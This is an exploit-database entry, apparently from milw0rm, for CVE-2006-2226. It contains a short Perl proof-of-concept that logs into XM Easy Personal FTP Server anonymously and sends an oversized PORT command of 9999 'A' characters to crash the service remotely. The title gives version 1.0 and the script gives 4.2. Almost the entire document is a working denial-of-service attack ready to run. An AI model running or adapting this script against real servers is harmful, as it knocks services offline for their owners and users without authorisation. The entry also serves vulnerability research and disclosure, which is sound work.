XM Easy Personal FTP Server 1.0 - 'Port' Remote Overflow (PoC)
Author: luka.research
type: dos
platform: windows
port:
date_added: 2006-03-03
date_updated:
verified: 1
codes: OSVDB-31504;CVE-2006-2226
tags:
aliases:
screenshot_url:
application_url:
#!/usr/bin/perl
# ---------------------------------------------------- #
# Name : XM Easy Personal FTP Server #
# Version : 4.2 #
# ---------------------------------------------------- #
# Type : dos / remote #
# Descritpion : buffer overflow for huge PORT value #
# ---------------------------------------------------- #
# luka.research - id:28022006001 #
# ---------------------------------------------------- #
use Net::FTP;
$host = @ARGV[0];
if ($host)
{
$ftp = Net::FTP->new($host, Debug => 0);
$ftp->login("anonymous",'me@here.there');
$ftp->port("\x41"x9999);
}
else {
print "\n- XM Easy Personal FTP Server 4.2 - PoC Exploit\n- Using: $0 host\n";
}
# milw0rm.com [2006-03-04]